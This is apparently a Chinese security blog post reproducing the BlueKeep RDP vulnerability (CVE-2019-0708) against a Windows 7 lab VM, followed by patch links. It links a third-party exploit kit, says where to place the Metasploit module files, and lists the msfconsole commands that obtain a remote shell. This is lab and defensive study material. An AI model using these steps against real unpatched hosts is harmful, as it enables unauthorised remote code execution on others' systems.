获取中...

-

Just a minute...

复现了一下最近热度挺高的CVE-2019-0708,这个漏洞是UAF漏洞。

漏洞背景

5月14日,微软官方5月份发布了安全补丁更新,其中Windows远程桌面服务远程代码执行漏洞(CVE-2019-0708),影响范围广。本次漏洞的影响程度严重,微软也针对已经停止更新的windows版本也发布了安全补丁。

漏洞描述

CVE-2019-0708 是微软2019年5月14日发布的一个严重的RDP远程代码执行漏洞,该漏洞无需身份认证
和用户交互,可能形成蠕虫爆发,影响堪比wannycry。2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块, 漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁。

漏洞编号

CVE-2019-0708

漏洞等级

高危

影响范围

Windows 7 for 32-bit SP1
Windows 7 for x64-based SP1
Windows Server 2008 for 32-bit SP2
Windows Server 2008 for 32-bit SP2 (Server Core installation)
Windows Server 2008 for Itanium-Based SP2
Windows Server 2008 for x64-based SP2
Windows Server 2008 for x64-based SP2 (Server Core installation)
Windows Server 2008 R2 for Itanium-BasedSystems SP1
Windows Server 2008 R2 for x64-based SP1
Windows Server 2008 R2 for x64-based SP1 (Server Core installation)
Windows XP SP3 x86
Windows XP SP2 x64
Windows XP Embedded SP3 x86
Windows Server 2003 SP2 x86
Windows Server 2003 SP2 x64
window 8和windows 10之后的版本不受影响

漏洞复现

前期准备:

win7 sp1镜像地址:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
CVE-2019-0708套件:
https://pan.baidu.com/s/1qLWYkYhINmFv4sopactsFQ 提取码:pyd6
更新msf:

1
2
apt-get update
apt-get install metasploit-framework

kali2019的镜像中msf直接就是最新版,可以直接用
将攻击套件放到msf响应的文件夹下

1
2
3
4
rdp.rb--> /usr/share/metasploit-framework/lib/msf/core/exploit/
rdp_scanner.rb--> /usr/share/metasploit-framework/modules/auxiliary/scanner/
cve_2019_0708_bluekeep_rce.rb--> /usr/share/metasploit-framework/modules/exploits/windows/rdp/ #如果没有,在相应的目录下新建rdp文件夹
cve_2019_0708_bluekeep.rb--> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

开启win7远程桌面
攻击机ip(kali linux):192.168.181.129
靶机ip(win7 SP1) :192.168.181.128

复现过程

打开msfmsfconsole
重新加载所有模块reload_all
查找0708模块search 0708
启用0708RDP攻击模块use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
info查看相应配置
主要配置有三项, rhostslhost,RDP_CLIENT_IPtarget
target到底设置几的参数说明,0代表自动根据指纹自动判断情况,1代表真实机器,2代表目标系统在virtualbox虚拟机下运行,3代表目标系统在VMWare虚拟机下运行,4代表目标系统在Hyper-V虚拟机下运行。
我用的vmware,target设置为3

1
2
3
4
5
set rhosts 192.168.181.128
set rdp_client_ip 192.168.181.128
set lhost 192.168.181.128
set target 3
run

成功获得shell,,,实在不行就多run几次,看运气喽

修复方式

下载补丁:
Win7 sp1:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows
6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Win08 R2:
http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows
6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

漏洞分析

https://www.anquanke.com/post/id/181577#h2-0

https://www.bilibili.com/read/cv3563885?share_medium=android&share_source=qq&bbid=Nw8-DzYAM1BkBjQFeQV5infoc&ts=1569130900378

相关文章
评论
分享
  • CVE-2010-2883分析复现

    CVE-2010-2883是pdf阅读器Adobe Reader的一个栈溢出漏洞。 漏洞描述CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析文字文件SING表中的uniqueN...

    CVE-2010-2883分析复现
  • 网鼎杯部分wp

    pwnboom1分析远程已经打不通了,远程的偏移和本地的偏移不一样,只能复现一下本地的了。 首先看到流程图,代码量很大,有很大的switch语句和嵌套结构,可能是虚拟机或者是解析器。 从下图看出是一个C语言的解析器。 然后看了...

    网鼎杯部分wp
  • 网络设备配置与管理

    Linux网络设备与管理大作业 下图为某企业网络拓扑图,接入层采用二层交换机2960,汇聚和核心层使用了一台三层交换机3560 24PS,局域网边缘采用一台路由器LanRouter用于连接到外部网络的Isp Router两台路由器...

    网络设备配置与管理
Please check the parameter of comment in config.yml of hexo-theme-Annie!